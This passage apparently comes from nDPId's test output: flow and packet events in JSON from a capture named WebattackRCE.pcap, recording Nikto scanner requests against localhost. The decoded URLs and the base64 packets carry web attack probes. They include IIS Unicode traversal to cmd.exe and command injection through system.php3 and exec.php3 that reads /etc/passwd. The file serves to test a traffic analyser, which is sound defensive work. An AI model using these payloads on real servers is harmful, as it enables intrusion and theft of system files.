01098{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277871,"flow_last_seen":1576420277871,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51022,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/iisadmpwd\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003192)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277873,"flow_last_seen":1576420277873,"flow_idle_time":7580000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"midstream":1,"thread_ts_msec":1576420277873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_packet_id":1,"flow_last_seen":1576420277873,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":252,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":252,"pkt_l4_len":218,"thread_ts_msec":1576420277873,"pkt":"AAAAAAAAAAAAAAAACABFAADuNNpAAEAGBy5\/AAABfwAAAcdQH5AuMg3l88MKY4AYAED+4gAAAQEICp1m\/5mdZv+ZR0VUIC9tc2FkYy8uLiVjMCVhZi4uLy4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5MykNCg0K"}
01106{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277873,"flow_last_seen":1576420277873,"flow_idle_time":7580000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"midstream":1,"thread_ts_msec":1576420277873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51024,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003193)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277874,"flow_last_seen":1576420277874,"flow_idle_time":7580000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":189,"midstream":1,"thread_ts_msec":1576420277874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00730{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_packet_id":1,"flow_last_seen":1576420277874,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"thread_ts_msec":1576420277874,"pkt":"AAAAAAAAAAAAAAAACABFAADxWrBAAEAG4VR\/AAABfwAAAcdSH5DZZWOTGgkmxYAYAED+5QAAAQEICp1m\/5qdZv+aR0VUIC9wYnNlcnZlci8uLiVjMCVhZi4uLy4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01109{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277874,"flow_last_seen":1576420277874,"flow_idle_time":7580000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":189,"midstream":1,"thread_ts_msec":1576420277874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51026,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pbserver\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003194)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277875,"flow_last_seen":1576420277875,"flow_idle_time":7580000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277875,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_packet_id":1,"flow_last_seen":1576420277875,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":1576420277875,"pkt":"AAAAAAAAAAAAAAAACABFAADs1jZAAEAGZdN\/AAABfwAAAcdUH5CUA+8Kq3ejjIAYAED+4AAAAQEICp1m\/5udZv+bR0VUIC9ycGMvLi4lYzAlYWYuLi8uLiVjMCVhZi4uL3dpbm50L3N5c3RlbTMyL2NtZC5leGU\/L2MrZGlyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01104{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277875,"flow_last_seen":1576420277875,"flow_idle_time":7580000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277875,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51028,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/rpc\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003195)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277877,"flow_last_seen":1576420277877,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_packet_id":1,"flow_last_seen":1576420277877,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420277877,"pkt":"AAAAAAAAAAAAAAAACABFAADl6fRAAEAGUhx\/AAABfwAAAcdWH5B7VdDQBDmQE4AYAED+2QAAAQEICp1m\/52dZv+dR0VUIC9zY3JpcHRzLy4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTYpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01096{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277877,"flow_last_seen":1576420277877,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51030,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003196)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277878,"flow_last_seen":1576420277878,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277878,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_packet_id":1,"flow_last_seen":1576420277878,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420277878,"pkt":"AAAAAAAAAAAAAAAACABFAADltn1AAEAGhZN\/AAABfwAAAcdYH5Dqro9H\/GjzZIAYAED+2QAAAQEICp1m\/56dZv+eR0VUIC9zY3JpcHRzLy4uJWMxJTFjLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01096{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277878,"flow_last_seen":1576420277878,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277878,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51032,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003197)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277880,"flow_last_seen":1576420277880,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277880,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00722{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_packet_id":1,"flow_last_seen":1576420277880,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1576420277880,"pkt":"AAAAAAAAAAAAAAAACABFAADqdQ5AAEAGxv1\/AAABfwAAAcdaH5DlNEwz0kNZnYAYAED+3gAAAQEICp1m\/6CdZv+gR0VUIC9zY3JpcHRzLy4uJWMxJTFjLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIrYzpcIiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01103{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277880,"flow_last_seen":1576420277880,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277880,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51034,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir+c:\\\"","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003198)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277882,"flow_last_seen":1576420277882,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277882,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_packet_id":1,"flow_last_seen":1576420277882,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":266,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":266,"pkt_l4_len":232,"thread_ts_msec":1576420277882,"pkt":"AAAAAAAAAAAAAAAACABFAAD8MthAAEAGCSJ\/AAABfwAAAcdcH5B7UwvpG4XAvoAYAED+8AAAAQEICp1m\/6GdZv+hR0VUIC9fdnRpX2Jpbi8uLiVjMCVhZi4uLy4uJWMwJWFmLi4vLi4lYzAlYWYuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5OSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01121{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277882,"flow_last_seen":1576420277882,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277882,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51036,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/..%c0%af..\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003199)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277883,"flow_last_seen":1576420277883,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277883,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_packet_id":1,"flow_last_seen":1576420277883,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1576420277883,"pkt":"AAAAAAAAAAAAAAAACABFAADcUThAAEAG6uF\/AAABfwAAAcdeH5DOhWgJaQI1xYAYAED+0AAAAQEICp1m\/6OdZv+jR0VUIC9hZG1pbi9zeXN0ZW0ucGhwMz9jbWQ9Y2F0JTIwL2V0Yy9wYXNzd2QgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMyMTYpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277883,"flow_last_seen":1576420277883,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277883,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51038,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/system.php3?cmd=cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003216)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277885,"flow_last_seen":1576420277885,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_packet_id":1,"flow_last_seen":1576420277885,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"thread_ts_msec":1576420277885,"pkt":"AAAAAAAAAAAAAAAACABFAADVkAVAAEAGrBt\/AAABfwAAAcdgH5ANV6k94mK\/lYAYAED+yQAAAQEICp1m\/6WdZv+lR0VUIC9hZG1pbi9zeXN0ZW0ucGhwMz9jbWQ9ZGlyJTIwYzpcXCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzIxNykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01078{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277885,"flow_last_seen":1576420277885,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51040,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/system.php3?cmd=dir%20c:\\\\","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003217)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277887,"flow_last_seen":1576420277887,"flow_idle_time":7580000,"flow_min_l4_payload_len":166,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"midstream":1,"thread_ts_msec":1576420277887,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_packet_id":1,"flow_last_seen":1576420277887,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":232,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":232,"pkt_l4_len":198,"thread_ts_msec":1576420277887,"pkt":"AAAAAAAAAAAAAAAACABFAADawa5AAEAGem1\/AAABfwAAAcdiH5DPxPiU5alglIAYAED+zgAAAQEICp1m\/6edZv+nR0VUIC9hZG1pbi9leGVjLnBocDM\/Y21kPWNhdCUyMC9ldGMvcGFzc3dkIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMjE4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01083{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277887,"flow_last_seen":1576420277887,"flow_idle_time":7580000,"flow_min_l4_payload_len":166,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"midstream":1,"thread_ts_msec":1576420277887,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51042,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/exec.php3?cmd=cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003218)"}}
